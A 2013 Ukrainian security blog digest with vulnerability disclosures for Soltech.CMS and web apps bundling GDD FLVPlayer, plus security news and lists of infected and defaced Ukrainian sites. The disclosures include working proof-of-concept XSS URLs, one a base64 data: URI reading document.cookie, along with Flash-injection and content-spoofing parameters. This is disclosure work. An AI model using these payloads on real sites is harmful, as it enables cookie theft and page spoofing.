Websecurity - Веб безпека

13.07.2013

У травні, 26.05.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості в Soltech.CMS. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в Soltech.CMS.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам.

27.08.2013

В системі використовується вразлива версія JW Player 4.2.90.

Cross-Site Scripting (WASC-08):

http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/plugins/flashplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Content Spoofing (WASC-12):

http://site/plugins/flashplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/plugins/flashplayer/player.swf?file=1.flv&image=1.jpg
http://site/plugins/flashplayer/player.swf?config=1.xml
http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua

Вразливі Soltech.CMS v 0.4 та попередні версії.

У серпні місяці Microsoft випустила 8 патчів. Що більше ніж у липні.

У серпневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 8 бюлетенів по безпеці. Що закривають 23 уразливості в програмних продуктах компанії. Три патчі закривають критичні уразливості та п’ять патчів закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT. А також Microsoft Internet Explorer і Exchange Server.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://vipnutrition.com.ua - інфекція була виявлена 11.07.2013. Зараз сайт входить до переліку підозрілих.
• http://screenshot.com.ua - інфекція була виявлена 13.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://rurik.at.ua - інфекція була виявлена 29.06.2013. Зараз сайт входить до переліку підозрілих.
• http://ukrdom.biz - інфекція була виявлена 25.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://skd.vn.ua - інфекція була виявлена 21.07.2013. Зараз сайт входить до переліку підозрілих.
• http://web.kharkov.ua - інфекція була виявлена 22.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://irp.lg.ua - інфекція була виявлена 05.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://vb-agro.org.ua - інфекція була виявлена 22.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://vb-derevo.org.ua - інфекція була виявлена 23.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://buznec.com - інфекція була виявлена 29.06.2013. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• Foscam <= 11.37.2.48 path traversal vulnerability (деталі)
• Multiple Vulnerabilities in Kasseler CMS (деталі)
• Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability (деталі)
• Project Pier Web Vulnerabilities (деталі)
• Privoxy Proxy Authentication Credential Exposure (деталі)

Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них I Love It (про дірки в цій темі я вже писав), Megusta, Multipress, Lolzine, V1. Та існують інші уразливі теми для WordPress з gddflvplayer.swf.

XSS (через Flash Injection) (WASC-08):

I Love It:

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf

Megusta:

http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf

Multipress:

http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf

Lolzine:

http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf

V1:

http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/iloveit/

http://site/wp-content/themes/megusta/

http://site/wp-content/themes/multipress/

http://site/wp-content/themes/Lolzine/

http://site/wp-content/themes/v1/

В останній темі шлях може бути v1, v1.0, v1.3.5 та інші варіанти.

Наведені XSS та FPD уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі всі версії наступних веб додатків: I Love It, Megusta, Multipress, Lolzine, V1.

За повідомленням www.xakep.ru, PayPal закрила уразливість, що дозволяла видалити чужий акаунт.

Незалежний фахівець з безпеки Йонут Черніка, розкрив інформацію про серйозну уразливість на сайті платіжної системи PayPal. Донедавна будь-який бажаючий міг видалити чужий акаунт PayPal і створити новий під тим же ім’ям. Зараз уразливість вже виправлена працівниками платіжної системи.

Про дірявий PayPal я вже писав раніше.

За повідомленням ain.ua, за DDoS-атаку на сайт політичної партії киянину загрожує 6 років в’язниці.

Тридцатидвухлітнього киянина будуть судити за DDoS-атаку на сайт однієї з політичних партій. Зокрема, прокуратурою АР Крим був затверджений обвинувальний висновок у карному проваджені по факту блокування роботи сайта регіонального відділення однієї з політичних партій. Безпосередньо мережева атака, що була підкріплена підробкою звертання глави кримського уряду, відбулася під час останніх виборів.

Хоча в заяві прокуратури не фігурує назва політичної партії, не виключено, що мова йде про “Партію Регіонів”. У жовтні 2012 року сайт кримської республіканської організації “Партії регіонів” був взломаний, а пізніше на нього була проведена DDoS-атака.

Це вже третій затриманий DDoS-ер в Україні, про два подібних випадки я писав раніше. Першого затримали в 2009 році, а другого - на початку 2013 року.

За повідомленням www.xakep.ru, шкідливу програму Jekyll провели в каталог AppStore.

Традиційно прийнято вважати, що модерація мобільних додатків для включення в каталог Apple AppStore відбувається дуже ретельно, і провести туди шкідливе ПЗ неможливо. Фахівцям з безпеки з Технологічного інституту Джорджії (США) вдалося довести зворотне. Вони успішно помістили додаток у AppStore і зуміли реалізувати в ньому шкідливу функціональність за допомогою ROP-атаки (атака повернення в бібліотеку, Return Oriented Programming). Грамотно проведена ROP-атака дозволяє обійти захист за допомогою цифрового підпису в AppStore і механізм захисту DEP, що і зробив автор програми Тіелей Ванг.

Про malware в Google Play я вже писав, а зараз черга дійшла до Apple AppStore.

У серпні, 16.08.2013, вийшов Mozilla Firefox 23.0.1. Нова версія браузера вийшла лише через десять днів після виходу Firefox 23. І в ній виправлені баги допущені в останньому релізі.

Mozilla представила коригувальний випуск Firefox 23.0.1 у якому усунуті три помилки:

• Непрацездатність системи перевірки орфографії при розміщенні профілю в директорії, що містить не ASCII-символи.
• Порушення якості звуку при використанні WebRTC.
• Артефакти відображення при відтворенні H.264-відео в Windows Vista.

В даній добірці експлоіти в веб додатках:

• Samsung DVR Firmware 1.10 - Authentication Bypass Vulnerability (деталі)
• DeWeS 0.4.2 - Directory Traversal Vulnerability (деталі)
• Open-FTPD 1.2 Arbitrary File Upload Vulnerability (деталі)
• HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow (деталі)
• MinaliC Webserver 2.0.0 - Buffer Overflow (деталі)

Сьогодні я виявив Content Spoofing та Cross-Site Scripting уразливості в численних веб додатках з GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Зокрема в Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer для MODx, Pixelfind Administrator, WHMCompleteSolution. Та в інших веб додатках. А також цей флеш відео та аудіо плеєр використовується на багатьох сайтах як самостійний веб додаток.

XSS (через Flash Injection) (WASC-08):

Order Master Pro:

http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):

http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer для MODx:

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:

http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:

http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf

Наведені XSS уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі наступні веб додатки: усі версії Order Master Pro, CMS Pask 3 (Pixelwerk admin v.3.3) і попередні версії, усі версії gddflvplayer для MODx, усі версії Pixelfind Administrator та усі версії WHMCompleteSolution.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://podillyarehab.gov.ua (хакерами з islamic ghosts team) - 31.05.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.putivl-rda.gov.ua (хакером Dr.SHA6H) - 13.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.ndippp.gov.ua (хакером Dr.SHA6H) - 25.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.yuna.ua (хакером RBG HomS)
• http://visnik-press.com.ua (хакером RBG HomS) - 21.08.2013, зараз сайт вже виправлений адмінами